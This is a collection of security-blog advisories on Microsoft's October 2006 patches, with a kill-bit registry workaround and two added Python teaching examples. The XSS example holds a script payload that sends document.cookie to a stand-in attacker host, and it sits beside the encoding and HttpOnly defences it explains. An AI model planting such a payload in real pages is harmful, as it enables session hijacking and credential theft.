SANS ISC InfoSec Handlers Diary Blog

Microsoft Patch Tuesday - October 2006 STATUS

Published: 2006-10-10
Last Updated: 2006-10-12 13:02:19 UTC
by John Bambenek (Version: 2)

Overview of the October 2006 Microsoft patches and their status.


IMPORTANT NOTE: There will be no more support for Windows XP Service Pack 1 after this month; no further patches will be released for that version.

Additional note: The reason for distinguishing between private and public disclosure is that the "bad guys" have potentially had more time to work on the vulnerabilities when the disclosure was public. In theory (and I realize that this is only potential), private disclosure means the clock starts now for the "bad guys" to develop exploits. It has some impact on the severity of the problem, in my opinion.

Columns: bulletin; affected component; known problems (CVE ids, KB article, superseded bulletin); known exploits; Microsoft rating; ISC rating(*) for clients / servers.

MS06-056  ASP.NET cross-site scripting
  Known problems:   CVE-2006-3436 (information disclosure); KB 922770
  Known exploits:   No known exploits, privately reported to MS
  Microsoft rating: Moderate
  ISC rating(*):    clients Less Urgent / servers Important

MS06-057  WebFolderView ActiveX (setSlice)
  Known problems:   CVE-2006-3730 (remote code execution); KB 923191
  Known exploits:   Exploits available, publicly reported
  Microsoft rating: Critical
  ISC rating(*):    clients PATCH NOW / servers Important

MS06-058  4 remote code execution problems in PowerPoint
  Known problems:   CVE-2006-3435, CVE-2006-3876, CVE-2006-3877, CVE-2006-4694; KB 924163; replaces MS06-028
  Known exploits:   Actively being exploited, privately reported to MS
  Microsoft rating: Critical
  ISC rating(*):    clients Critical / servers Less Urgent

MS06-059  4 remote code execution problems in Excel
  Known problems:   CVE-2006-2387, CVE-2006-3431, CVE-2006-3867, CVE-2006-3875; KB 924164; replaces MS06-037
  Known exploits:   Proof of concept available, no exploits yet, publicly disclosed
  Microsoft rating: Important
  ISC rating(*):    clients Important / servers Less Urgent

MS06-060  4 remote code execution problems in Word
  Known problems:   CVE-2006-3651, CVE-2006-3647, CVE-2006-4534, CVE-2006-4693; KB 924554; replaces MS06-027
  Known exploits:   Proof of concept available, no exploits yet, publicly disclosed
  Microsoft rating: Important
  ISC rating(*):    clients Important / servers Less Urgent

MS06-061  Remote code execution in XSLT (MSXML)
  Known problems:   CVE-2006-4685, CVE-2006-4686; KB 924191; replaces MS02-008
  Known exploits:   No known exploits, privately reported to MS
  Microsoft rating: Critical
  ISC rating(*):    clients Critical / servers Less Urgent

MS06-062  3 remote code execution problems in Office & Publisher
  Known problems:   CVE-2006-3434, CVE-2006-3650, CVE-2006-3864, CVE-2006-3868; KB 922581; replaces MS06-048
  Known exploits:   No known exploits, privately reported to MS
  Microsoft rating: Important (new versions) / Critical (old versions)
  ISC rating(*):    clients Important / servers Less Urgent

MS06-063  Buffer overflow / denial of service in Server Service
  Known problems:   CVE-2006-4696, CVE-2006-3942; KB 923414; replaces MS06-035
  Known exploits:   Proof of concept available, no exploits yet, publicly disclosed
  Microsoft rating: Important
  ISC rating(*):    clients Important / servers Important

MS06-064  Denial of service attacks in IPv6
  Known problems:   CVE-2004-0230, CVE-2004-0790, CVE-2005-0688 (denial of service in IPv6); KB 922819
  Known exploits:   Proof of concept available, no exploits yet, publicly disclosed
  Microsoft rating: Low
  ISC rating(*):    clients Less Urgent (**) / servers Less Urgent (**)

MS06-065  Remote code execution in Object Packager
  Known problems:   CVE-2006-4692 (remote code execution); KB 924496
  Known exploits:   No known exploits, privately reported to MS
  Microsoft rating: Moderate
  ISC rating(*):    clients Important / servers Less Urgent

We will update this page as the issues evolve; we appreciate updates from readers.
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers, such as not using Outlook, MSIE, Word etc. to do traditional office or leisure work on them.
  • The rating is not a risk analysis as such. It is a rating of the importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
(**): If you are running an IPv6 network, this probably is more important to you.

--
John Bambenek , bambenek/at/gmail/dot/com
with the help of: Johannes Ullrich, Joel Esler, Pedro Bueno, Kyle Haugsness


MS06-057: Vulnerability in Windows Shell Could Allow Remote Code Execution (926043)

Published: 2006-10-10
Last Updated: 2006-10-11 14:19:06 UTC
by Joel Esler (Version: 1)
https://www.microsoft.com/technet/security/bulletin/ms06-057.mspx
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4690
http://isc.sans.org/diary.php?storyid=1749

Affected Software:
- Microsoft Windows 2000 Service Pack 4
- Microsoft Windows XP Service Pack 1 and Service Pack 2
- Microsoft Windows XP Professional x64 Edition
- Microsoft Windows Server 2003 and Windows Server 2003 Service Pack 1 (Mitigated)
- Microsoft Windows Server 2003 and Windows Server 2003 with SP1 for Itanium-based Systems (Mitigated)
- Microsoft Windows Server 2003 x64 Edition (Mitigated)

Impact:  Remote Code Execution
Severity:  Critical

(This replaces MS06-045 for XP SP1.)

Description:  This is a remote code execution vulnerability reachable through Internet Explorer, caused by improper validation of the WebViewFolderIcon ActiveX object (its setSlice method).

Why are the Windows Server 2003 entries marked "Mitigated"?

By default, Internet Explorer on Windows Server 2003 runs in a restricted mode known as Enhanced Security Configuration. This mode mitigates this vulnerability.

Workarounds

To set the kill bits for the CLSIDs {e5df9d10-3b52-11d1-83e8-00a0c90dc849} and {844F4806-E8A8-11d2-9652-00C04FC30871}, paste the following text into a text editor such as Notepad and save the file with the .reg file name extension.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{e5df9d10-3b52-11d1-83e8-00a0c90dc849}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{844F4806-E8A8-11d2-9652-00C04FC30871}]
"Compatibility Flags"=dword:00000400

You can apply this .reg file to individual systems by double-clicking it. You can also apply it across domains by using Group Policy.
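As an added example (not from the ISC diary and not Microsoft's code), the following Python builds the same kill-bit .reg text for a list of CLSIDs, parses a .reg file back to confirm that the kill bit (0x400 in Compatibility Flags) is actually set for each control, and, when run on Windows, can read the live value through the standard winreg module. The function names are this example's own, and the sample input is the constructed .reg text the builder emits.

```python
"""Build, parse and audit ActiveX kill-bit (.reg) entries such as the
MS06-057 workaround. Added example; not code from the ISC diary or Microsoft."""
import re

KILL_BIT = 0x00000400  # Compatibility Flags bit that stops IE instantiating the control
COMPAT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"

# The two CLSIDs named in the MS06-057 workaround
MS06_057_CLSIDS = (
    "{e5df9d10-3b52-11d1-83e8-00a0c90dc849}",
    "{844F4806-E8A8-11d2-9652-00C04FC30871}",
)

_KEY_RE = re.compile(r"^\[(?P<path>[^\]]+)\]$")
_CLSID_RE = re.compile(r"^\{[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\}$", re.I)
_FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:(?P<hex>[0-9a-f]{8})$', re.I)


def build_killbit_reg(clsids):
    """Return .reg text (Regedit 5.00 format) that sets the kill bit for each CLSID."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        lines.append(f"[{COMPAT_KEY}\\{clsid}]")
        lines.append(f'"Compatibility Flags"=dword:{KILL_BIT:08x}')
        lines.append("")
    return "\r\n".join(lines)


def parse_compat_flags(reg_text):
    """Map lower-cased CLSID -> Compatibility Flags value found in .reg text.
    Keys outside the ActiveX Compatibility branch are ignored."""
    flags = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = _KEY_RE.match(line)
        if key:
            current = None
            parent, _, leaf = key.group("path").rpartition("\\")
            if parent.lower() == COMPAT_KEY.lower() and _CLSID_RE.match(leaf):
                current = leaf.lower()
            continue
        val = _FLAGS_RE.match(line)
        if val and current is not None:
            flags[current] = int(val.group("hex"), 16)
    return flags


def is_killed(flags_value):
    """True if the kill bit is set (other bits may be set as well)."""
    return bool(flags_value & KILL_BIT)


def missing_killbits(reg_text, clsids=MS06_057_CLSIDS):
    """CLSIDs from `clsids` that the .reg text does not kill-bit."""
    flags = parse_compat_flags(reg_text)
    return [c for c in clsids if not is_killed(flags.get(c.lower(), 0))]


def live_compat_flags(clsid, wow64=False):
    """On Windows, read the live Compatibility Flags for clsid; None if the
    value is absent or this is not Windows. wow64=True reads the branch that
    32-bit IE on 64-bit Windows uses."""
    try:
        import winreg
    except ImportError:
        return None
    base = r"SOFTWARE\Wow6432Node" if wow64 else r"SOFTWARE"
    subkey = base + r"\Microsoft\Internet Explorer\ActiveX Compatibility" + "\\" + clsid
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
            value, _ = winreg.QueryValueEx(key, "Compatibility Flags")
            return value
    except OSError:
        return None


if __name__ == "__main__":
    reg = build_killbit_reg(MS06_057_CLSIDS)
    print(reg)
    print("not kill-bitted:", missing_killbits(reg))
```

Two caveats when auditing with this: on 64-bit Windows the 32-bit Internet Explorer consults the Wow6432Node branch, so check both branches; and a kill bit only stops IE from instantiating the control, it does not unregister or remove it.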

IE7 to hit the streets -- Reloaded

Published: 2006-10-10
Last Updated: 2006-10-10 23:49:45 UTC
by Joel Esler (Version: 10)
I have pulled the article in its original form because of feedback.

Thanks to one of our readers who wrote in to tell us that IE7 will be released this month via Automatic Update, according to Microsoft's "IEBlog". Do a risk assessment for your organization to decide whether you should deploy the browser globally, taking into account the pros and cons of the software.

If you can take this moment to try and move your organization to a different browsing platform for normal daily browsing, that may be something you want to look into.  We've said it before, and we'll say it again, diversity is good. 

Reader Dan writes in to tell us:
"You may also want to note that Firefox even has a plug-in available to open certain links in IE. This makes it even easier to follow your advice of only using IE when you absolutely must." -- https://addons.mozilla.org/firefox/35/

Reader "Vision Jinx" writes in to tell us:
"I notice that IE View just opens the page in IE as a POP up type feature. IE Tabs (https://addons.mozilla.org/firefox/1419/) actually will load a FF Tab that uses IE therefore no need for all them extra Windows, as it just uses a tab in Firefox."

Joel Esler

Delays on Windows Update & the Death of SUS

Published: 2006-10-10
Last Updated: 2006-10-10 19:59:48 UTC
by John Bambenek (Version: 1)
Windows Update is currently experiencing delays and not serving up all of those happy patches. The MSRC is reporting some delays in getting the patches posted. If you need them immediately you can download them directly from the bulletins. ISC reader Jim McCormick found that clearing out C:\WINDOWS\SoftwareDistribution\DataStore and C:\WINDOWS\SoftwareDistribution\Download (stop the Automatic Updates service first, then start it again afterwards) took care of the problem. The choice is yours. You could also always wait. :)

Alan Mercer sent in a reminder that Microsoft is discontinuing support for SUS on December 6th, 2006. Because that date falls before the December patch cycle, November will be the last patch cycle that SUS is supported for. With the holidays coming up, it's time to think about upgrading to WSUS.

MS Office vulnerabilities (-058, -059, -060, -062)

Published: 2006-10-10
Last Updated: 2006-10-10 19:37:30 UTC
by Kyle Haugsness (Version: 2)
There are four advisories for Microsoft Office this month. All of them appear to be standard client-side vulnerabilities, so the exploitation model is: someone evil sends a document of the affected type with an exploit buried inside, and if the exploit works, the attacker gets the privileges of the user opening the document. These types of bugs have been very popular lately.

MS06-058: Four vulnerabilities in PowerPoint. One of these has been exploited in the wild (PowerPoint Malformed Record).

MS06-059: Four vulnerabilities in Excel.  Two of these have had proof of concept exploit code posted publicly already; the other two vulnerabilities were privately reported to Microsoft.

MS06-060: Four vulnerabilities in Word.  Two of these have been publicly disclosed already; the other two vulnerabilities were privately reported to Microsoft.

MS06-062: Three vulnerabilities in Office and Publisher that were reported privately.  Exploit code and details have not been released yet.


MS06-064: Vulnerabilities in IPv6

Published: 2006-10-10
Last Updated: 2006-10-10 19:21:49 UTC
by John Bambenek (Version: 1)
According to the advisory, this one fixes several vulnerabilities: CAN-2004-0790, CAN-2004-0791, CAN-2004-0230 and CAN-2005-0688 (the CAN- prefix is the older "candidate" form of the same CVE identifiers).

The best way to understand the fixes is to think of them as an IPv6 version of
the same patch that fixed these same vulnerabilities last year with
MS05-019 (http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx)

Another thing: this is a remotely triggered DoS condition, which could make your system reboot or stop responding, so I would recommend you follow the same procedure (test, test, test, deploy).

MS06-063: Server service (Mailslot DoS and SMB Rename)

Published: 2006-10-10
Last Updated: 2006-10-10 19:21:10 UTC
by Kyle Haugsness (Version: 2)
There are two vulnerabilities in this advisory. The first is a simple denial of service against all Windows platforms. The attack vector is TCP port 139 or 445. Apparently, an uninitialized buffer can be modified remotely to crash the box. Exploit code has been available for this bug since July 19, 2006. Famed handler Swa covered it in a diary entry last month: http://isc.sans.org/diary.php?storyid=1599

It looks like the Core Security folks found this after MS06-035 in July (http://www1.corest.com/common/showdoc.php?idx=562). Microsoft also has a blog entry on it: http://blogs.technet.com/msrc/archive/2006/07/28/443837.aspx

There probably isn't any need to freak out on this particular vulnerability.  The exploit has been out in the wild for several months.  If you are seeing some mysterious reboots on Windows machines and untrusted people can hit TCP 139 or 445 on those hosts, then this could potentially solve your problems (although Microsoft is claiming that it hasn't been used in the wild yet).  Otherwise, there are no code execution possibilities with this vulnerability, so you don't need to be in "emergency mode" to patch it.

The second vulnerability (SMB Rename) is a remote code execution bug against the Server service, but it requires authentication.  So this isn't readily wormable (except maybe in a corporate environment if a user with admin privileges was owned).  This one is a little higher priority than the DoS above.
Keywords: MSFT1006

MS06-065: Remote Code Execution in Windows Object Packager

Published: 2006-10-10
Last Updated: 2006-10-10 18:59:47 UTC
by John Bambenek (Version: 1)
There is a remote code execution vulnerability in Windows Object Packager (MS06-065) in the way the application handles file extensions. A specially crafted file could execute code if a user is lured to a malicious website and opens the file. However, quite a bit of user interaction is required for the exploit to actually work. Enhanced Security Configuration on Windows Server 2003 effectively mitigates this problem.

The CVE for this vulnerability is CVE-2006-4692; it is unlikely to see much action in the wild.

MS06-061: XSLT/MSXML Buffer Overflow Code Execution Vulnerability (moderate)

Published: 2006-10-10
Last Updated: 2006-10-10 18:40:14 UTC
by Johannes Ullrich (Version: 1)
This vulnerability sounds like a classic parser buffer overflow. The advisory actually covers two distinct vulnerabilities, but only one of them allows arbitrary code execution.

As with similar vulnerabilities, the user has to expose the browser to malicious XML code. This could happen by visiting a compromised site. Once the browser is exposed to the exploit, the attacker's code inherits all the privileges of the user running the browser.

Mitigation steps: Sandboxie, not running as administrator and similar measures will help limit the impact of the vulnerability. This is first of all a client issue, less a server issue. You could also try the "Internet Explorer Enhanced Security Configuration". However, I find it a bit too strict most of the time (e.g. no JavaScript).


Keywords: MSFT1006

MS06-056: ASP.NET XSS Information Disclosure Vulnerability (moderate)

Published: 2006-10-10
Last Updated: 2006-10-10 18:39:10 UTC
by Johannes Ullrich (Version: 1)
An XSS vulnerability in ASP.NET could allow information disclosure. The bulletin is a bit vague on the details, but it does mention a problem with headers. Typically, cookie information can be disclosed using XSS attacks; in turn, the cookie information can be used to impersonate an authenticated user.

The script injected via XSS inherits all the capabilities of the user whose browser runs it. For example, a user could be tricked into clicking a link that escalates privileges for a malicious user. Exploitation typically requires intimate knowledge of the respective web application.

XSS exploits are typically not browser specific. Any browser is "vulnerable", given that the actual problem lies in the web application. Turning off JavaScript may help, but then again, you will typically hit this issue while visiting a trusted web site (for example your own web site written in ASP.NET).

You will probably consider this problem more severe ("critical") if you use ASP.NET extensively for internal applications. On the same note, test the patch against your specific web applications first.

Other mitigation steps: Disable ASP.NET if not used on your web server.

This patch is not important for workstations and only applies to servers running web sites with ASP.NET support turned on.
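As an added illustration of the mechanism described above (generic Python, not ASP.NET and not code from the bulletin or from this diary), the following shows a page that echoes a request header without encoding beside the HTML-encoded version, and a session cookie issued with the HttpOnly flag so that script injected into the page cannot read it through document.cookie. The payload, the attacker host name and the cookie name are constructed for the example.

```python
"""Reflected XSS via an echoed request header: vulnerable vs. encoded output,
plus the cookie-side mitigation. Added example, not from the ISC diary."""
import html
from http.cookies import SimpleCookie

# Constructed attacker payload: ships document.cookie to an assumed attacker host
XSS_PAYLOAD = "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"


def render_unsafe(user_agent):
    """Vulnerable: an attacker-controlled header value is pasted into the markup verbatim."""
    return f"<html><body><p>Your browser: {user_agent}</p></body></html>"


def render_safe(user_agent):
    """Hardened: the same page with the untrusted value HTML-encoded before output,
    so <, >, &, quotes become entities and cannot open a tag or attribute."""
    return f"<html><body><p>Your browser: {html.escape(user_agent, quote=True)}</p></body></html>"


def contains_script_tag(page):
    """Crude check, used only to show the difference: is there a raw <script> tag?"""
    return "<script" in page.lower()


def session_set_cookie(session_id):
    """Set-Cookie header for the session id. HttpOnly keeps document.cookie (and thus
    an XSS payload) from reading it; Secure keeps it off plaintext HTTP.
    The cookie name 'session' is an assumption of this example."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["path"] = "/"
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    print("unsafe:", render_unsafe(XSS_PAYLOAD))
    print("safe:  ", render_safe(XSS_PAYLOAD))
    print(session_set_cookie("c0ffee"))
```

HttpOnly limits what a successful XSS can steal; it does not stop the injected script from issuing requests with the victim's cookies attached, so output encoding of every untrusted value remains the actual fix.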

Keywords: MSFT1006